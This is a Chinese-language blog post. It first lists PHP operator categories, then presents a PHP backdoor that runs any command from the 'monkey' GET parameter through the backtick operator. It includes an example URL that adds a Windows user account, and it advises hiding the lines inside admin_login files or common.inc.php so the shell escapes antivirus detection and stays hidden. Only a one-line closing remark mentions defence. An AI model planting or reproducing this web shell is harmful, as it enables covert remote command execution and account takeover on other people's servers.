php内大致有这么几种运算符。
按运算符号的功能分为:
一:算术运算符(+ - * / % ++ --)
二:字符串运算符 . 可以叫连接运算符号
三:赋值运算符 = += -= *= /= %= .=
四:比较运算符 > < >= <= == === <> != !==
五:逻辑运算符 ;;或and ||或or !或not
六:位运算符 ; | ^ ~ << >> <<<
七:其他运算符 ? : `` @ => -> :: ; $
而其中`` 在PHP中,我给它命名是系统运算符
因为包含在``内的字符串可以当做系统命令来执行,那么简单的。。
作者:猴子
为了逃过杀软的查杀。。。。一种新型的PHP后门出来了。
<?php
$houzi = $_GET['monkey'];
echo `$houzi`;
?>
http://www.sbmonkey.com/1.php?monkey=net user monkey monkey /add
很明显的monkey变量的内容为net user monkey monkey /add。需要执行什么命令只需要monkey变量的值。
我们不必如此拘束。我们可以把他放在任意文件内
如:admin_login.asp
把这两句加入在中间增强隐蔽效果。
$houzi = $_GET['monkey'];
echo `$houzi`;
执行:
http://www.XXXXXXXXX.com /admin/admin_login.php?monkey=net user monkey monkey /add
以前有的人喜欢把后门放在common.inc.php内。这样,所有require 此文件的文件都可以当做后门
既然这样
那么我们完全可以在common.inc.php内使用
$GLOBALS['monkey']="net user monkey monkey /add"
来声明一个超级全局变量,然后在其他我们想插入的文件内插入echo `$houzi`;
这样做方便,免杀效果好
需要谨慎防御
| 
